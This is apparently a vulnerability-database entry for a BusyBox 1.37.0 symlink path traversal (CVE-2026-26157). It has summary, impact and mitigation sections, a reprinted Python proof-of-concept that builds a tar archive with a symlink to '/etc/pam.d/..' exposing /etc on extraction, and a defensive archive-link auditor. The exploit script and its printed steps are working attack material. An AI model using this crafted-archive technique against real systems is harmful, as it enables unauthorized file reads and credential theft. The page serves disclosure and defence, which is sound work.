BusyBox 1.37.0 - Path Traversal
This is a path traversal vulnerability affecting BusyBox version 1.37.0. The vulnerability allows an attacker to manipulate file paths to access files outside the intended directory. Exploit code is publicly available in Python. No patch or official remediation information is provided.
AI Analysis
Technical Summary
BusyBox 1.37.0 contains a path traversal vulnerability that can be exploited to access unauthorized files by manipulating file paths. The exploit is documented and includes Python code demonstrating the attack. No specific affected versions beyond 1.37.0 are detailed, and no vendor advisory or patch information is available.
Potential Impact
Successful exploitation could allow an attacker to read or possibly write files outside the intended directory scope, potentially exposing sensitive information or altering system files. The exact impact depends on the BusyBox usage context and permissions.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch is available, restrict access to BusyBox utilities and monitor for suspicious activity related to path traversal attempts.
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: BusyBox 1.37.0 - Path Traversal
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157

"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)

Description:
    BusyBox archive extraction utilities fail to properly sanitize symlink
    targets containing trailing ".." components. The strip_unsafe_prefix()
    function in archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../")
    which only matches the 4-character pattern and misses 3-character
    trailing "/.." sequences.

    This allows an attacker to craft malicious archives with symlinks
    pointing to arbitrary filesystem locations, enabling information
    disclosure through symlink traversal.

Affected Components:
    - tar (primary vector)
    - unzip
    - rpm
    - ar

Impact:
    - CVSS Score: 7.8 (HIGH)
    - Arbitrary file read via symlink traversal
    - Information disclosure
    - Credential theft

Root Cause:
    archival/libarchive/unsafe_prefix.c:23

    The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:

    cp2 = strstr(cp, "/../");  // Only matches "/../", misses "/pam.d/.."
    if (!cp2) break;

Attack Scenario:
    1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
    2. Victim extracts archive using BusyBox tar
    3. Symlink created without sanitization
    4. Symlink resolves to /etc directory
    5. Application reading 'sensitive_data' exposes /etc contents

References:
    - https://github.com/calilkhalil/research
    - Red Hat CNA Case: INC3907198
"""

import tarfile
import sys
import os


def create_exploit():
    """
    Creates a malicious TAR file exploiting CVE-2026-26157.

    The archive contains a symlink with an unsanitized target that
    resolves outside the extraction directory.
    """
    exploit_file = 'CVE-2026-26157_exploit.tar'

    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # Create symlink with trailing ".." in target path
            # This bypasses strip_unsafe_prefix() pattern matching
            info = tarfile.TarInfo('sensitive_data')
            info.type = tarfile.SYMTYPE
            info.linkname = '/etc/pam.d/..'  # Resolves to /etc
            tar.addfile(info)

        print(f"[+] Exploit created: {exploit_file}")
        print(f"\n[*] Exploitation steps:")
        print(f" 1. mkdir test_extraction && cd test_extraction")
        print(f" 2. busybox tar xf ../{exploit_file}")
        print(f" 3. readlink -f sensitive_data")
        print(f" Expected output: /etc")
        print(f" 4. ls sensitive_data/")
        print(f" Result: Lists /etc directory contents")
        print(f"\n[!] Impact: Arbitrary directory read via symlink traversal")
        print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")

        return exploit_file

    except Exception as e:
        print(f"[-] Error creating exploit: {e}")
        sys.exit(1)


def show_technical_details():
    """Display technical analysis of the vulnerability"""
    print("\n" + "="*70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("="*70)
    print("\nVulnerable Function:")
    print(" archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
    print("\nVulnerable Code Pattern:")
    print(" cp2 = strstr(cp, \"/../\"); // Only matches 4-char sequence")
    print(" if (!cp2) break;")
    print("\nBypass Technique:")
    print(" Path: /etc/pam.d/..")
    print(" Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
    print(" Result: Sanitization bypassed, symlink created with original target")
    print("\nExploitation Flow:")
    print(" 1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print(" 2. get_header_tar() extracts symlink metadata")
    print(" 3. Symlink target NOT sanitized (bypass detected)")
    print(" 4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print(" 5. Target resolves: /etc/pam.d/.. -> /etc")
    print(" 6. Reading 'sensitive_data' = reading /etc")
    print("="*70 + "\n")


if __name__ == "__main__":
    print("="*70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("="*70)

    # Display technical analysis
    show_technical_details()

    # Create exploit
    exploit_file = create_exploit()

    print("\n[*] Mitigation:")
    print(" - Update BusyBox to patched version")
    print(" - Patch applies strip_unsafe_prefix() to symlink targets")
    print(" - Do not extract untrusted archives with elevated privileges")
    print("\n[*] For educational and authorized testing purposes only")
```
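The root cause given in the exploit's docstring, a substring test for "/../" that misses a trailing "/..", can be screened for before an archive is extracted. The following is an added example, not code from the original page or from BusyBox: it audits the link targets in a tar archive without extracting anything and reports whether the substring test would have caught each one. The function names, the constructed sample archive and the policy of flagging every absolute target and every ".." component are assumptions made here.

```python
import io
import tarfile


def substring_check(target):
    """The flawed test quoted in the write-up: only the 4-char "/../" matches."""
    return "/../" in target


def component_check(target):
    """Flag absolute targets and any ".." component, trailing ones included.

    Assumed policy: stricter than a resolver, so it cannot be chained around.
    """
    return target.startswith("/") or ".." in target.split("/")


def audit_links(fileobj):
    """Return (member, target, caught_by_substring) for each risky link."""
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:  # reads headers only; nothing is extracted
            if not (member.issym() or member.islnk()):
                continue
            if component_check(member.linkname):
                findings.append((member.name, member.linkname,
                                 substring_check(member.linkname)))
    return findings


def build_sample():
    """Constructed in-memory archive: two harmless links plus the page's target."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, target in [("docs/latest", "v2"),
                             ("lib/libfoo.so", "libfoo.so.1"),
                             ("sensitive_data", "/etc/pam.d/..")]:
            info = tarfile.TarInfo(name)
            info.type = tarfile.SYMTYPE
            info.linkname = target
            tar.addfile(info)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name, target, seen in audit_links(build_sample()):
        print(f"{name} -> {target} (substring test fires: {seen})")
```

Run against an untrusted archive by passing an open binary file object to `audit_links()`; any finding is a reason to reject the archive or extract it only inside a sandbox.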
Technical Details
- Edb Id: 52538
- Has Exploit Code: true
- Code Language: python
Threat ID: 69f5140dcbff5d86105a4033
Added to database: 5/1/2026, 8:58:53 PM
Last enriched: 5/1/2026, 8:59:23 PM
Last updated: 5/2/2026, 5:49:14 AM